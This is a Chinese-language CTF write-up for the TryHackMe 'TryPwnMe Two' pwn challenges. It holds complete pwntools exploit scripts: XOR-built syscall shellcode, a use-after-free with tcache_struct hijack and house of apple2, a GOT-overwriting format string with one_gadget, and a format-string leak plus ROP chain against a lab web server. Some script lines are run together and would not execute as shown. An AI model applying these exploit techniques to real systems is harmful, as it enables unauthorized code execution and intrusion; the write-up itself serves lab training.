TryHackMe: TryPwnMe Two

TryExecMe2

限制了直接进行系统调用，即syscall sysenter int 0x80，但是这样的限制是十分好绕过的，我们只需要通过异或生成syscall构造read再次写入shellcode即可

构造read

shellcode = asm("""
mov rdx, 0x100
mov r15, rdi
xor rdi, rdi
mov rsi, r15
mov cx, 0x454f
xor cx, 0x4040
mov [r15+0x1e], cx
""")

完整exp

from pwn import *
from pwncli import *
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def li(a):print(hex(a))
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def get_32():return u32(p.recvuntil(b'\xf7')[-4:])
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# def get_sb():
#     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def debug():gdb.attach(p)context(os='linux',arch='amd64',log_level='debug')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# elf=ELF('./pwn')
# p = process('./pwn')
# gdb.attach(p,'b *$rebase(0x1485)')
p = remote("10.10.131.135",5002)
shellcode = asm("""
mov rdx, 0x100
mov r15, rdi
xor rdi, rdi
mov rsi, r15
mov cx, 0x454f
xor cx, 0x4040
mov [r15+0x1e], cx
""")
s(shellcode)
pause()
payload = b"\x90"*0x25+asm(shellcraft.sh())
s(payload)
inter()

TryaNote

存在uaf，可以泄露libc和堆地址，劫持tcache_struct来进行任意地址写，2.35的libc，移除了我们在之前版本利用的各种hook，本题给了一个win，它可以去执行我们指定位置的一次调用，但是因为种种原因，我并没有成功，最后用了house of apple2

泄露libc和堆地址

add(0x420,b"a")
add(0x100,b"a")
add(0x100,b"a")
add(0x100,b"a")
add(0x300,b"a")
delete(0)
show(0)
libc_base = get_addr() - 2202848
li(libc_base)
delete(1)
show(1)
heap_base = u64(p.recv(5).ljust(8, b'\x00'))
heap_base = heap_base << 12
li(heap_base)

因为并没有限制我们申请的堆块大小，我们就申请一个大于0x400大小的堆块，这样可以在free后直接进入unsortedbin中，此时该堆块fd位置就会被写上libc地址，show即可得到，再free一下1号堆块，这样它会被放入tcache中，show即可获取堆地址，注意要左移12位，具体参考tcache在2.35的变化，自行搜索

劫持tcache_struct

delete(2)
_IO_list_all=libc_base+libc.sym['_IO_list_all']
setcontext=libc_base + libc.sym['setcontext']
_IO_wfile_jumps =libc_base+libc.sym['_IO_wfile_jumps']
fake_io = heap_base+0x7e0
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_execmd_when_exit(fake_io, libc_base+libc.sym["_IO_wfile_jumps"], libc_base+libc.sym["system"])
edit(2,p64(((heap_base+0x7e0)>>12)^heap_base))
add(0x100,p64(0))
add(0x100,p64(0)+p64(0x290)+b"\x07\x00"*0x58+b"\x00\x00"*8+p64(_IO_list_all)+p64(heap_base+0x7e0))

接下来再次释放2号堆块，这样tcache中0x110处就会出现链表，我们修改2号的fd指向tcache_struct即可达到任意地址写的目的，关于为什么要写b"\x07\x00"*0x58+b"\x00\x00"*8+p64(_IO_list_all)+p64(heap_base+0x7e0))，请参考tcache_struct的结构体，总之，在我们下次申请0x90大小的堆块时，我们会申请到_IO_list_all

house_of_apple2

add(0x90,p64(heap_base+0x7e0))
edit(2,payload)
debug()
sla(b'>>', b'0')

我们将_IO_list_all写入我们伪造好的fake_file的堆地址，这样我们可以就可以执行system(“/bin/sh”)，利用这个方法有前提是可以正常退出或者exit退出来刷新IO流，具体参考 house of apple

完整exp

from pwn import *
from pwncli import *
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def li(a):print(hex(a))
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def get_32():return u32(p.recvuntil(b'\xf7')[-4:])
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def debug():gdb.attach(p)context(os='linux',arch='amd64',log_level='debug')
libc = ELF('./libc.so.6')
elf=ELF('./pwn')
p = process('./pwn')
def add(size,content):sla(b'>>', b'1')sla(b'size:\n', str(size).encode())sa(b'data:\n', content)
def delete(index):sla(b'>>', b'4')sla(b'index:\n', str(index).encode())
def edit(index, content):sla(b'>>', b'3')sla(b'index:\n', str(index).encode())sa(b'data:\n', content)
def show(index):sla(b'>>', b'2')sla(b'index:\n', str(index).encode())
def win(idx,content):sla(b'>>', b'5')sla(b'index:\n', str(idx).encode())sla(b'data:\n', content)add(0x420,b"a")
add(0x100,b"a")
add(0x100,b"a")
add(0x100,b"a")
add(0x300,b"a")
delete(0)
show(0)
libc_base = get_addr() - 2202848
li(libc_base)
delete(1)
show(1)
heap_base = u64(p.recv(5).ljust(8, b'\x00'))
heap_base = heap_base << 12
li(heap_base)delete(2)
_IO_list_all=libc_base+libc.sym['_IO_list_all']
setcontext=libc_base + libc.sym['setcontext']
_IO_wfile_jumps =libc_base+libc.sym['_IO_wfile_jumps']
fake_io = heap_base+0x7e0
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_execmd_when_exit(fake_io, libc_base+libc.sym["_IO_wfile_jumps"], libc_base+libc.sym["system"])
edit(2,p64(((heap_base+0x7e0)>>12)^heap_base))
add(0x100,p64(0))
add(0x100,p64(0)+p64(0x290)+b"\x07\x00"*0x58+b"\x00\x00"*8+p64(_IO_list_all)+p64(heap_base+0x7e0))add(0x90,p64(heap_base+0x7e0))
edit(2,payload)
debug()
sla(b'>>', b'0')inter()

NotSpecified2

格式化字符串漏洞，got表可以写，因此修改exit的got表为_start进行无限格式化字符串，泄露libc利用one_gadget进行getshell

劫持exit的got表

payload = fmtstr_payload(6,{0x404038:0x4010D0})
sl(payload)

泄露libc

payload = b"%73$p"
sl(payload)
rl(b"Thanks ")
libc_base = int(p.recv(14), 16) - 171408
ogg = libc_base + 0xebcf5

完整exp

from pwn import *
from pwncli import *
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def li(a):print(hex(a))
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def get_32():return u32(p.recvuntil(b'\xf7')[-4:])
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# def get_sb():
#     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def debug():gdb.attach(p)context(os='linux',arch='amd64',log_level='debug')
# libc = ELF('./libc.so.6')
# elf=ELF('./pwn')
# p = process('./pwn')
# gdb.attach(p,'b *0x4012FD')
p = remote("10.10.187.89",5000)
rl(b"username:")
payload = fmtstr_payload(6,{0x404038:0x4010D0})
sl(payload)
rl(b"username:")
payload = b"%73$p"
sl(payload)
rl(b"Thanks ")
libc_base = int(p.recv(14), 16) - 171408
ogg = libc_base + 0xebcf5
payload = fmtstr_payload(6,{0x404038:ogg})
rl(b"username:")
sl(payload)
inter()

SlowServer

一个简单的web pwn，漏洞点位于DEBUG和POST，DEBUG存在格式化字符串，而POST则存在栈溢出

注意：远程与本地的栈可能会存在差异，需要自己尝试及猜测，使用ubuntu22.04时发现与远程十分相似，建议使用ubuntu22.04调试

泄露基地址和栈地址

p = remote("192.168.138.129", 5555)
debug = b"DEBUG %3$p"
p.send(debug)
base = int(p.recv(14), 16)- 8320
print(hex(base))
pause()
p = remote("192.168.138.129", 5555)
debug = b"DEBUG %28$p"
p.send(debug)
stack = int(p.recv(14), 16) + 0x100
print(hex(stack))

ORW读flag

post = (b"POST /submit HTTP/1.1"+p64(0)+p64(pop_rax)+p64(2)+p64(pop_rsi)+p64(0)+p64(syscall_ret)+p64(pop_rdi)+p64(5)+p64(pop_rsi)+p64(stack)+p64(pop_rdx_r12)+p64(0x50)+p64(20)+p64(base+elf.plt["read"])+p64(pop_rdi)+p64(4)+p64(pop_rsi)+p64(stack)+p64(pop_rdx_r12)+p64(0x50)+p64(20)+p64(base+elf.plt["write"])+p64(0)*(720//8)+b"flag.txt\x00")
p = remote("192.168.138.129", 5555)
p.send(post)

调试可以发现，在我们想调用open的时候rdi本身就会指向一个栈地址，因此我们可以通过调试确认偏移，将flag.txt写到该处，之后就是read读flag，write写即可

注意：read的rdi值需要为5，open后观察rax值即可，write的rdi值需要为4，4是本机与服务器建立的socket管道，这样才会发送到本地的攻击机，如果是1，代表标准输出，攻击机无法看到

完整exp

from pwn import *
# # 定义 GET 请求
# get = b"GET /submit HTTP/1.1\r\nHost: 192.168.138.129\r\n\r\n"+b"a"*0x300elf=ELF('./slowserver')
# 连接到远程服务器
p = remote("192.168.138.129", 5555)
debug = b"DEBUG %3$p"
p.send(debug)
base = int(p.recv(14), 16)- 8320
print(hex(base))
pause()
p = remote("192.168.138.129", 5555)
debug = b"DEBUG %28$p"
p.send(debug)
stack = int(p.recv(14), 16) + 0x100
print(hex(stack))
bss = base+elf.bss()+0x251
stack = bss #可以往栈上写，也可以往bss段上写，此处选择bss，删除亦可
pop_rdi = base+0x1816
pop_rsi = base+0x1811
free_got = base+0x3F18
pop_rdx_r12 = base + 0x180d
syscall_ret = base + 0x1813
pop_rax = base+0x180b
pop_rsp = base+0x180f
leave_ret = base+0x154c
push_rbp = base+0x1807
bss = base+elf.bss()+0x200
read_got = base+elf.got["read"]
pop_rbp = base+0x1413
write = base + elf.plt["write"]
# 定义 POST 请求
post = (b"POST /submit HTTP/1.1"+p64(0)+p64(pop_rax)+p64(2)+p64(pop_rsi)+p64(0)+p64(syscall_ret)+p64(pop_rdi)+p64(5)+p64(pop_rsi)+p64(stack)+p64(pop_rdx_r12)+p64(0x50)+p64(20)+p64(base+elf.plt["read"])+p64(pop_rdi)+p64(4)+p64(pop_rsi)+p64(stack)+p64(pop_rdx_r12)+p64(0x50)+p64(20)+p64(base+elf.plt["write"])+p64(0)*(720//8)+b"flag.txt\x00")
p = remote("192.168.138.129", 5555)
p.send(post)p.interactive()